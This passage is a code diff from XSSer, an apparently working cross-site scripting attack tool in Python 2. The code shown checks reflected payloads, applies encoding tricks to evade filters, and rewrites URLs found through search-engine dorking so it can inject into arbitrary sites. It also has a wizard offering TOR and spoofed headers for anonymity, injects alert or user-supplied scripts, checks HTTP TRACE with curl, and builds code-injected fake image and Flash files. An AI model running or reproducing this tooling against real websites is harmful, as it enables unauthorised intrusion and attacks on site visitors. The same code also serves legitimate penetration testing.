+                        self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
+                    elif heuristic_param == "/":
+                        self.heuris_slash_notfound = self.heuris_slash_notfound + 1
+                    elif heuristic_param == ">":
+                        self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
+                    elif heuristic_param == "<":
+                        self.heuris_minor_notfound = self.heuris_minor_notfound + 1
+                    elif heuristic_param == ";":
+                         self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
+                    elif heuristic_param == "'":
+                         self.heuris_colon_notfound = self.heuris_colon_notfound + 1
+                    elif heuristic_param == '"':
+                         self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
+                    elif heuristic_param == "=":
+                         self.heuris_equal_notfound = self.heuris_equal_notfound + 1
+                    self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
+        elif self.options.hash:
+            for key, value in self.final_hashes.iteritems():
+                self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
+            self.report("\n" +"="*45)
+        else:
+            for key, value in self.final_hashes.iteritems():
+                if "XSA" in value:
+                    method = "xsa"
+                    hashing = key
+                elif "XSR" in value:
+                    method = "xsr"
+                    hashing = key
+                elif "COO" in value:
+                    method = "coo"
+                    hashing = key
+                else:
+                    method = "url"
+                    hashing = key
+                if self.options.Str:
+                    payload_string = payload["payload"].replace("PAYLOAD", key)
+                    hashed_payload = self.encoding_permutations(payload_string)
+                    hashed_payload = hashed_payload.replace(",", "%2C")
+                    if str(hashed_payload) in str(dest_url):
+                        self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                elif self.options.Mix:
+                    payload_string = payload["payload"].replace("PAYLOAD", key)
+                    hashed_payload = self.encoding_permutations(payload_string)
+                    hashed_payload=urllib.quote(hashed_payload)
+                    if str(hashed_payload) in str(dest_url):
+                        self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                elif self.options.Dec:
+                    payload_string = payload["payload"].replace("PAYLOAD", key)
+                    hashed_payload = self.encoding_permutations(payload_string)
+                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                    if str(hashed_payload) in str(dest_url):
+                        self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                elif self.options.Hex:
+                    payload_string = payload["payload"].replace("PAYLOAD", key)
+                    hashed_payload = self.encoding_permutations(payload_string)
+                    hashed_payload = hashed_payload.replace("%", "%25")
+                    if str(hashed_payload) in str(dest_url):
+                        self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                elif self.options.Hes:
+                    payload_string = payload["payload"].replace("PAYLOAD", key)
+                    hashed_payload = self.encoding_permutations(payload_string)
+                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                    hashed_payload = hashed_payload.replace(";", "%3B")
+                    if str(hashed_payload) in str(dest_url):
+                        self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                else:
+                    if self.options.Cem:
+                        enc_perm = options.Cem.split(",")
+                        payload_string = payload["payload"].replace("PAYLOAD", key)
+                        for e in enc_perm:
+                            hashed_payload = self.encoding_permutations(payload_string)
+                            if str(e) == "Str":
+                                hashed_payload = hashed_payload.replace(",", "%2C")
+                            if e == "Mix":
+                                hashed_payload=urllib.quote(hashed_payload)
+                            if e == "Dec":
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                            if e == "Hex":
+                                hashed_payload = hashed_payload.replace("%", "%25")
+                            if e == "Hes":
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                hashed_payload = hashed_payload.replace(";", "%3B")
+                        if str(hashed_payload) in str(dest_url):
+                            self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                    else:
+                        if str(key) in str(dest_url):
+                            self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
+                        else:
+                            if key in current_hashes:
+                                if method == "xsa":
+                                    self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
+                                elif method == "xsr":
+                                    self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
+                                elif method == "coo":
+                                    self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
+            self.report("\n" +"="*45)
+        if str(curl_handle.info()["http-code"]) == "404":
+            self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
+        elif str(curl_handle.info()["http-code"]) == "403":
+            self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
+        elif str(curl_handle.info()["http-code"]) == "400":
+            self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
+        elif str(curl_handle.info()["http-code"]) == "401":
+            self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
+        elif str(curl_handle.info()["http-code"]) == "407":
+            self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
+        elif str(curl_handle.info()["http-code"]) == "408":
+            self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
+        elif str(curl_handle.info()["http-code"]) == "500":
+            self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
+        elif str(curl_handle.info()["http-code"]) == "501":
+            self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
+        elif str(curl_handle.info()["http-code"]) == "502":
+            self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
+        elif str(curl_handle.info()["http-code"]) == "503":
+            self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
+        elif str(curl_handle.info()["http-code"]) == "504":
+            self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
+        elif str(curl_handle.info()["http-code"]) == "0":
+            self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
+        else:
+            self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
+        if str(curl_handle.info()["http-code"]) == "404":
+            self.not_connection = self.not_connection + 1
+        elif str(curl_handle.info()["http-code"]) == "503":
+            self.forwarded_connection = self.forwarded_connection + 1
+        else:
+            self.other_connection = self.other_connection + 1
+
+    def check_positive(self, curl_handle, dest_url, payload, query_string):
+        """
+        Perform extra check for positives
+        """
+        body = curl_handle.body()
+        pass
+
+    def create_options(self, args=None):
+        """
+        Create options for OptionParser.
+        """
+        self.optionParser = XSSerOptions()
+        self.options = self.optionParser.get_options(args)
+        if not self.options:
+            return False
+        return self.options
+
+    def _get_attack_urls(self):
+        """
+        Process payload options and make up the payload list for the attack.
+        """
+        urls = []
+        options = self.options
+        p = self.optionParser
+        if options.imx:
+            self.create_fake_image(options.imx, options.script)
+            return []
+        if options.flash:
+            self.create_fake_flash(options.flash, options.script)
+            return []
+        if options.update:
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            try:
+                print("\nTrying to update to the latest stable version...\n")
+                Updater() 
+            except:
+                print("\nSomething was wrong!. You should clone XSSer manually with:\n")
+                print("$ git clone https://code.03c8.net/epsylon/xsser\n")
+
+                print "\nAlso you can try this other mirror:\n"
+                print "$ git clone https://github.com/epsylon/xsser\n"
+            return []
+        
+        if options.wizard: # processing wizard template
+           if self.user_template is not None:
+               self.options.statistics = True # detailed output
+               if self.user_template[0] == "DORKING": # mass-dorking
+                   self.options.dork_file = True
+                   self.options.dork_mass = True
+               elif "http" in self.user_template[0]: # from target url
+                   self.options.url = self.user_template[0]
+               else: # from file
+                   self.options.readfile = self.user_template[0]
+               if self.user_template[1] == "CRAWLER": # crawlering target
+                   self.options.crawling = "10"
+               else: # manual payload (GET or POST)
+                   if self.user_template_conntype == "GET":
+                       self.options.getdata = self.user_template[1]
+                   else:
+                       self.options.postdata = self.user_template[1]
+               if self.user_template[2] == "Proxy: No - Spoofing: Yes":
+                   self.options.ignoreproxy = True
+                   self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
+                   self.options.referer = "127.0.0.1" # spoof referer
+               elif self.user_template[2] == "Proxy: No - Spoofing: No":
+                   self.options.ignoreproxy = True
+               else: # using proxy + spoofing
+                   self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
+                   self.options.referer = "127.0.0.1" # spoof referer
+                   if self.user_template[2] is not None:
+                       self.options.proxy = self.user_template[2]
+                   else:
+                       self.options.ignoreproxy = True
+               if self.user_template[3] == "Not using encoders":
+                   pass
+               elif self.user_template[3] == "Hex": # Hexadecimal
+                   self.options.Hex = True
+               elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
+                   self.options.Str = True
+                   self.options.Une = True
+               else: # Character encoding mutations
+                   self.options.Cem = self.user_template[3]
+               if self.user_template[4] == "Alertbox": # Classic AlertBox injection
+                   self.options.finalpayload = "<script>alert('XSS');</script>"
+               else:
+                   if self.user_template[4] is not None: # Inject user script
+                       self.options.finalpayload = self.user_template[4]
+                   else: # not final injection
+                       pass 
+           else: # exit
+               return
+
+        if options.target: # miau!
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("Testing [Full XSS audit]... ;-)")
+            self.report('='*75)
+            self.report("\n[Info] The following actions will be performed at the end:\n")
+            self.report("  1- Output with detailed statistics\n")
+            self.report("  2- Export results to files: \n\n     - a) XSSreport.raw \n     - b) XSSer_<target>_<datetime>.xml\n")
+            self.options.crawling = "99999" # set max num of urls to crawl
+            self.options.crawler_width = "5" # set max num of deeping levels
+            self.options.statistics = True # detailed output
+            self.options.timeout = "60" # timeout
+            self.options.retries = "2" # retries  
+            self.options.delay = "5" # delay
+            self.options.threads = "10" # threads
+            self.options.followred = True # follow redirs
+            self.options.nohead = False # HEAD check
+            self.options.reversecheck = True # try to establish a reverse connection 
+            self.options.fuzz = True # autofuzzing 
+            self.options.coo = True # COO
+            self.options.xsa = True # XSA
+            self.options.xsr = True # XSR
+            self.options.dcp = True # DCP
+            self.options.dom = True # DOM
+            self.options.inducedcode = True # Induced
+            self.options.fileoutput = True # Important: export results to file (.raw)
+            self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
+            self.check_trace() # XST
+            urls = [options.target]
+
+        if options.url:
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            if self.options.crawling:
+                self.report("Testing [XSS from CRAWLER]...")
+            else:
+                self.report("Testing [XSS from URL]...")
+            self.report('='*75)
+            urls = [options.url]
+
+        elif options.readfile:
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("Testing [XSS from FILE]...")
+            self.report('='*75)
+            try:
+                f = open(options.readfile)
+                urls = f.readlines()
+                urls = [ line.replace('\n','') for line in urls ]
+                f.close()
+            except:
+                import os.path
+                if os.path.exists(options.readfile) == True:
+                    self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
+                else:
+                    self.report('\nCannot found file: ', options.readfile, "\n")
+
+        elif options.dork: # dork a query
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("Testing [XSS from DORK]... Good luck! ;-)")
+            self.report('='*75)
+            if options.dork_mass: # massive dorkering
+                for e in self.search_engines:
+                    try:
+                        dorker = Dorker(e)
+                        urls = dorker.dork(options.dork)
+                        i = 0
+                        for u in urls: # replace original parameter for injection keyword (XSS)
+                            p_uri = urlparse(u)
+                            uri = p_uri.netloc
+                            path = p_uri.path
+                            target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
+                            for key, value in target_params.iteritems(): # parse params to apply keywords
+                                for v in value:
+                                    target_params[key] = 'XSS'
+                            target_url_params = urllib.urlencode(target_params)
+                            u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+                            urls[i] = u
+                            i = i + 1
+                    except Exception, e:
+                        for reporter in self._reporters:
+                            reporter.mosquito_crashed(dorker.search_url, str(e.message))
+                    else:
+                        if urls is not None:
+                           for url in urls:
+                                for reporter in self._reporters:
+                                    reporter.add_link(dorker.search_url, url)
+            else:
+                if not options.dork_engine:
+                    options.dork_engine = 'duck' # default search engine [26-08/2019]
+                dorker = Dorker(options.dork_engine)
+                try:
+                    urls = dorker.dork(options.dork)
+                    i = 0
+                    for u in urls: # replace original parameter for injection keyword (XSS)
+                        p_uri = urlparse(u)
+                        uri = p_uri.netloc
+                        path = p_uri.path
+                        target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
+                        for key, value in target_params.iteritems(): # parse params to apply keywords
+                            for v in value:
+                                target_params[key] = 'XSS'
+                        target_url_params = urllib.urlencode(target_params)
+                        u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+                        urls[i] = u
+                        i = i + 1
+                except Exception, e:
+                    for reporter in self._reporters:
+                        reporter.mosquito_crashed(dorker.search_url, str(e.message))
+                else:
+                    if urls is not None:
+                        for url in urls:
+                            for reporter in self._reporters:
+                                reporter.add_link(dorker.search_url, url)
+
+        elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("Testing [XSS from DORK]... Good luck! ;-)")
+            self.report('='*75)
+            try:
+                f = open('core/fuzzing/dorks.txt')
+                dorks = f.readlines()
+                dorks = [ dork.replace('\n','') for dork in dorks ]
+                f.close()
+                if not dorks:
+                    print "\n[Error] - Imposible to retrieve 'dorks' from file.\n"
+                    return
+            except:
+                if os.path.exists('core/fuzzing/dorks.txt') == True:
+                    print '[Error] - Cannot open:', 'dorks.txt', "\n"
+                    return 
+                else:
+                    print '[Error] - Cannot found:', 'dorks.txt', "\n"
+                    return
+            if not options.dork_engine:
+                options.dork_engine = 'duck' # default search engine [26-08/2019]
+            if options.dork_mass: # massive dorkering
+                for e in self.search_engines:
+                    try:
+                        dorker = Dorker(e)
+                        for dork in dorks:
+                            urls = dorker.dork(dork)
+                        i = 0
+                        for u in urls: # replace original parameter for injection keyword (XSS)
+                            p_uri = urlparse(u)
+                            uri = p_uri.netloc
+                            path = p_uri.path
+                            target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
+                            for key, value in target_params.iteritems(): # parse params to apply keywords
+                                for v in value:
+                                    target_params[key] = 'XSS'
+                            target_url_params = urllib.urlencode(target_params)
+                            u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+                            urls[i] = u
+                            i = i + 1
+                    except Exception, e:
+                        for reporter in self._reporters:
+                            reporter.mosquito_crashed(dorker.search_url, str(e.message))
+                    else:
+                        if urls is not None:
+                            for url in urls:
+                                for reporter in self._reporters:
+                                    reporter.add_link(dorker.search_url, url)
+            else:
+                dorker = Dorker(options.dork_engine)
+                try:
+                    for dork in dorks:
+                        urls = dorker.dork(dork)
+                    i = 0
+                    for u in urls: # replace original parameter for injection keyword (XSS)
+                        p_uri = urlparse(u)
+                        uri = p_uri.netloc
+                        path = p_uri.path
+                        target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
+                        for key, value in target_params.iteritems(): # parse params to apply keywords
+                            for v in value:
+                                target_params[key] = 'XSS'
+                        target_url_params = urllib.urlencode(target_params)
+                        u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+                        urls[i] = u
+                        i = i + 1
+                except Exception, e:
+                    for reporter in self._reporters:
+                        reporter.mosquito_crashed(dorker.search_url, str(e.message))
+                else:
+                    if urls is not None:
+                        for url in urls:
+                            for reporter in self._reporters:
+                                reporter.add_link(dorker.search_url, url)
+
+        if options.crawling: # crawlering target(s)
+            nthreads = options.threads
+            self.crawled_urls = list(urls)
+            all_crawled = []
+            try:
+                self.options.crawling = int(self.options.crawling)
+            except:
+                self.options.crawling = 50
+            if self.options.crawler_width == None:
+                self.options.crawler_width = 2 # default crawlering-width
+            else:
+                try:
+                    self.options.crawler_width = int(self.options.crawler_width)
+                except:
+                    self.options.crawler_width = 2 # default crawlering-width
+            if self.options.crawler_local == None:
+                self.options.crawler_local = False # default crawlering to LOCAL
+            for url in set(urls):
+                self.report("\n[Info] Crawlering TARGET:", url, "\n\n   - Max. limit: "+ str(self.options.crawling)+ " \n   - Deep level: "+ str(options.crawler_width))
+            crawler = Crawler(self, Curl, all_crawled,
+                              self.pool)
+            crawler.set_reporter(self)
+            # now wait for all results to arrive
+            while urls:
+                self.run_crawl(crawler, urls.pop(), options)
+            while not self._landing:
+                for reporter in self._reporters:
+                    reporter.report_state('broad scanning')
+                try:
+                    self.pool.poll()
+                except NoResultsPending:
+                    crawler.cancel()
+                    break
+                if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
+                    self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
+                    crawler.cancel()
+                    break
+                time.sleep(0.1)
+            # re-parse crawled urls from main
+            parsed_crawled_urls = []
+            for u in self.crawled_urls:
+                if "XSS" in u:
+                    parsed_crawled_urls.append(u)
+                else:
+                    pass
+            self.crawled_urls = parsed_crawled_urls
+            # report parsed crawled urls
+            self.report("\n" + "-"*25)
+            self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
+            if self.options.verbose:
+                self.report("")
+                for u in self.crawled_urls:
+                    if '/XSS' in u:
+                        u = u.replace("/XSS", "")
+                    print " - " + str(u)
+            if len(self.crawled_urls) > 0:
+                self.report("")
+            else:
+                self.report("-"*25)
+                self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
+            return self.crawled_urls
+
+        if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
+            return urls
+            
+    def run_crawl(self, crawler, url, options):
+        def _cb(request, result):
+            pass
+
+        def _error_cb(request, error):
+            for reporter in self._reporters:
+                reporter.mosquito_crashed(url, str(error[0]))
+            traceback.print_tb(error[2])
+
+        def crawler_main(args):
+            return crawler.crawl(*args)
+        crawler.crawl(url, int(options.crawler_width),
+                      int(options.crawling),options.crawler_local)
+        
+    def poll_workers(self):
+        try:
+            self.pool.poll()
+        except NoResultsPending:
+            pass
+
+    def try_running(self, func, error, args=[]):
+        """
+        Try running a function and print some error if it fails and exists with
+        a fatal error.
+        """
+        try:
+            return func(*args)
+        except Exception, e:
+            self.report(error)
+            if DEBUG:
+                traceback.print_exc()
+ 
+    def check_trace(self):
+        """
+        Check for Cross Site Tracing (XST) vulnerability: 
+            1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules) 
+            2) check data sent on reply 
+        """
+        agents = [] # user-agents
+        try:
+            f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+        except:
+            f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+        for line in f:
+            agents.append(line)
+        agent = random.choice(agents).strip() # set random user-agent
+        referer = '127.0.0.1'
+        import subprocess, shlex
+        self.report('='*75)
+        self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
+        if self.options.xst:
+            xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
+        if self.options.target:
+            xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
+        line1 = xst.stdout.readline()
+        if self.options.verbose:
+            print "-"*25 + "\n"
+            while True:
+                line = xst.stdout.readline()
+                if line != '':
+                    print line.rstrip()
+                else:
+                    break
+            self.report("")
+        self.report('-'*50+"\n")
+        if "200 OK" in line1.rstrip():
+            print "[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n"
+        else:
+            print "[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n"
+        if self.options.target:
+            self.report('='*75)
+ 
+    def start_wizard(self):
+        """
+        Start Wizard Helper
+        """
+        #step 0: Menu
+        ans1=True
+        ans2=True
+        ans3=True
+        ans4=True
+        ans5=True
+        ans6=True
+
+        #step 1: Where
+        while ans1:
+            print("""\nA)- Where are your targets?\n
+             [1]- I want to enter the url of my target directly.
+             [2]- I want to enter a list of targets from a .txt file.
+            *[3]- I don't know where are my target(s)... I just want to explore! :-)
+             [e]- Exit/Quit/Abort.
+            """)
+            ans1 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
+            if ans1 == "1": # from url
+                url = raw_input("Target url (ex: http(s)://target.com): ")
+                if url.startswith("http"):
+                    ans1 = None
+                else:
+                    print "\n[Error] Your url is not valid!. Try again!"
+                    pass
+            elif ans1 == "2": # from file
+                url = raw_input("Path to file (ex: 'targets_list.txt'): ")
+                if url == None:
+                    print "\n[Error] Your are not providing a valid file. Try again!"
+                    pass
+                else:
+                    ans1 = None
+            elif ans1 == "3": # dorking
+                url = "DORKING" 
+                ans1 = None
+            elif (ans1 == "e" or ans1 == "E"):
+                print "Closing wizard..."
+                ans1=None
+                ans2=None
+                ans3=None
+                ans4=None
+                ans5=None
+                ans6=None
+            else:
+                print "\nNot valid choice. Try again!"
+
+        #step 2: How
+        while ans2:
+            print 22*"-"
+            print("""\nB)- How do you want to connect?\n
+             [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
+             [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
+             [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
+            *[4]- I don't know how to connect... Just do it! :-)
+             [e]- Exit/Quit/Abort.
+            """)
+            ans2 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
+            if ans2 == "1": # using GET
+                payload = raw_input("GET payload (ex: '/menu.php?q='): ")
+                if payload == None:
+                    print "\n[Error] Your are providing an empty payload. Try again!"
+                    pass
+                else:
+                    self.user_template_conntype = "GET"
+                    ans2 = None
+            elif ans2 == "2": # using POST
+                payload = raw_input("POST payload (ex: 'foo=1&bar='): ")
+                if payload == None:
+                    print "\n[Error] Your are providing an empty payload. Try again!"
+                    pass
+                else:
+                    self.user_template_conntype = "POST"
+                    ans2 = None
+            elif ans2 == "3": # crawlering
+                payload = "CRAWLER" 
+                ans2 = None
+            elif ans2 == "4": # crawlering
+                payload = "CRAWLER"
+                ans2 = None
+            elif (ans2 == "e" or ans2 == "E"):
+                print "Closing wizard..."
+                ans2=None
+                ans3=None
+                ans4=None
+                ans5=None
+                ans6=None
+            else:
+                print "\nNot valid choice. Try again!"
+
+        #step 3: Proxy
+        while ans3:
+            print 22*"-"
+            print("""\nC)- Do you want to be 'anonymous'?\n
+             [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
+             [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118. 
+            *[3]- Yes. But I haven't any proxy. :-)
+             [4]- No. It's not a problem for me to connect directly to the target(s).
+             [e]- Exit/Quit.
+            """)
+            ans3 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
+            if ans3 == "1": # using PROXY + spoofing
+                proxy = raw_input("Enter proxy [http(s)://server:port]: ")
+                ans3 = None
+            elif ans3 == "2": # using TOR + spoofing
+                proxy = 'Using TOR (default: http://127.0.0.1:8118)'
+                proxy = 'http://127.0.0.1:8118'
+                ans3 = None
+            elif ans3 == "3": # only spoofing
+                proxy = 'Proxy: No - Spoofing: Yes' 
+                ans3 = None
+            elif ans3 == "4": # no spoofing
+                proxy = 'Proxy: No - Spoofing: No'
+                ans3 = None
+            elif (ans3 == "e" or ans3 == "E"):
+                print "Closing wizard..."
+                ans3=None
+                ans4=None
+                ans5=None
+                ans6=None
+            else:
+                print "\nNot valid choice. Try again!"
+
+        #step 4: Bypasser(s)
+        while ans4:
+            print 22*"-"
+            print("""\nD)- Which 'bypasser(s' do you want to use?\n
+             [1]- I want to inject XSS scripts without any encoding.
+             [2]- Try to inject code using 'Hexadecimal'.
+             [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
+             [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex). 
+            *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
+             [e]- Exit/Quit.
+            """)
+            ans4 = raw_input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
+            if ans4 == "1": # no encode
+                enc = "Not using encoders"
+                ans4 = None
+            elif ans4 == "2": # enc: Hex
+                enc = 'Hex'
+                ans4 = None
+            elif ans4 == "3": # enc: Str+Une
+                enc = 'Str+Une' 
+                ans4 = None
+            elif ans4 == "4": # enc: Mix: Une+Str+Hex
+                enc = "Une,Str,Hex"
+                ans4 = None
+            elif ans4 == "5": # enc: no encode
+                enc = 'Not using encoders' 
+                ans4 = None
+            elif (ans4 == "e" or ans4 == "E"):
+                print "Closing wizard..."
+                ans4=None
+                ans5=None
+                ans6=None
+            else:
+                print "\nNot valid choice. Try again!"
+
+        #step 5: Exploiting
+        while ans5:
+            print 22*"-"
+            print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
+             [1]- I want to inject a classic "Alert" message box.
+             [2]- I want to inject my own scripts.
+            *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
+             [e]- Exit/Quit.
+            """)
+            ans5 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
+            if ans5 == "1": # alertbox
+                script = 'Alertbox'
+                ans5 = None
+            elif ans5 == "2": # manual
+                script = raw_input("Enter code (ex: '><script>alert('XSS');</script>): ")
+                if script == None:
+                    print "\n[Error] Your are providing an empty script to inject. Try again!"
+                    pass
+                else:
+                    ans5 = None
+            elif ans5 == "3": # no exploit
+                script = 'Not exploiting code' 
+                ans5 = None
+            elif (ans5 == "e" or ans5 == "E"):
+                print "Closing wizard..."
+                ans5=None
+                ans6=None
+            else:
+                print "\nNot valid choice. Try again!"
+
+        #step 6: Final
+        while ans6:
+            print 22*"-"
+            print "\nVery nice!. That's all. Your last step is to -accept or not- this template.\n"
+            print "A)- Target:", url
+            print "B)- Payload:", payload
+            print "C)- Privacy:", proxy
+            print "D)- Bypasser(s):", enc
+            print "E)- Final:", script
+            print("""
+            [Y]- Yes. Accept it and start testing!.
+            [N]- No. Abort it?.
+            """)
+            ans6 = raw_input("Your choice: [Y] or [N]\n")
+            if (ans6 == "y" or ans6 == "Y"): # YES
+                start = 'YES'
+                print 'Good fly... and happy "Cross" hacking !!! :-)\n'
+                ans6 = None
+            elif (ans6 == "n" or ans6 == "N"): # NO
+                start = 'NO'
+                print "Aborted!. Closing wizard..."
+                ans6 = None
+            else:
+                print "\nNot valid choice. Try again!"
+            if url and payload and proxy and enc and script:
+                return url, payload, proxy, enc, script
+            else:
+                return
+
+    def create_fake_image(self, filename, payload):
+        """
+        Create -fake- image with code injected
+        """
+        options = self.options
+        filename = options.imx
+        payload = options.script
+        image_xss_injections = ImageInjections()
+        image_injections = image_xss_injections.image_xss(options.imx , options.script)
+        return image_injections
+
+    def create_fake_flash(self, filename, payload):
+        """
+        Create -fake- flash movie (.swf) with code injected
+    	"""
+        options = self.options
+        filename = options.flash
+        payload = options.script
+        flash_xss_injections = FlashInjections()
+        flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
+        return flash_injections
+
+    def create_gtk_interface(self):
+        """
+        Create GTK Interface
+        """
+        options = self.options
+        from core.gtkcontroller import Controller, reactor
+        uifile = "xsser.ui"
+        controller = Controller(uifile, self)
+        self._reporters.append(controller)
+        if reactor:
+            reactor.run()
+        else:
+            import gtk
+            gtk.main()
+        return controller
+
+    def run(self, opts=None):
+        """
+        Run xsser.
+        """
+        self._landing = False
+        for reporter in self._reporters:
+            reporter.start_attack()
+        if opts:
+            options = self.create_options(opts)
+            self.set_options(options)
+        if not self.mothership and not self.hub:
+            self.hub = HubThread(self)
+            self.hub.start()
+        options = self.options
+        # step -1; order attacks
+        if self.options.hash: # not fuzzing/heuristic when hash precheck
+            self.options.fuzz = False
+            self.options.script = False
+            self.options.coo = False
+            self.options.xsa = False
+            self.options.xsr = False
+            self.options.dcp = False
+            self.options.dom = False
+            self.options.inducedcode = False
+            self.options.heuristic = False
+        if self.options.heuristic: # not fuzzing/hash when heuristic precheck
+            self.options.fuzz = False
+            self.options.script = False
+            self.options.coo = False
+            self.options.xsa = False
+            self.options.xsr = False
+            self.options.dcp = False
+            self.options.dom = False
+            self.options.inducedcode = False
+            self.options.hash = False
+        if self.options.Cem: # parse input at CEM for blank spaces
+            self.options.Cem = self.options.Cem.replace(" ","")
+        # step 0: third party tricks
+        try:
+            if self.options.imx: # create -fake- image with code injected
+                p = self.optionParser
+                self.report('='*75)
+                self.report(str(p.version))
+                self.report('='*75)
+                self.report("[Image XSS Builder]...")
+                self.report('='*75)
+                self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
+                self.report('='*75 + "\n")
+        except:
+            return
+
+        if options.flash: # create -fake- flash movie (.swf) with code injected
+            p = self.optionParser
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("[Flash Attack! XSS Builder]...")
+            self.report('='*75)
+            self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
+            self.report('='*75 + "\n")
+
+        if options.xsser_gtk:
+            self.create_gtk_interface()
+            return
+
+        if self.options.wizard: # start a wizard helper
+            p = self.optionParser
+            self.report('='*75)
+            self.report(str(p.version))
+            self.report('='*75)
+            self.report("[Wizard] Generating XSS attack...")
+            self.report('='*75)
+            self.user_template = self.start_wizard()
+
+        if self.options.xst: # check for cross site tracing
+            p = self.optionParser
+            if not self.options.target:
+                self.report('='*75)
+                self.report(str(p.version))
+                self.report('='*75)
+                self.report("[XST Attack!] checking for HTTP TRACE method ...")
+                self.report('='*75)
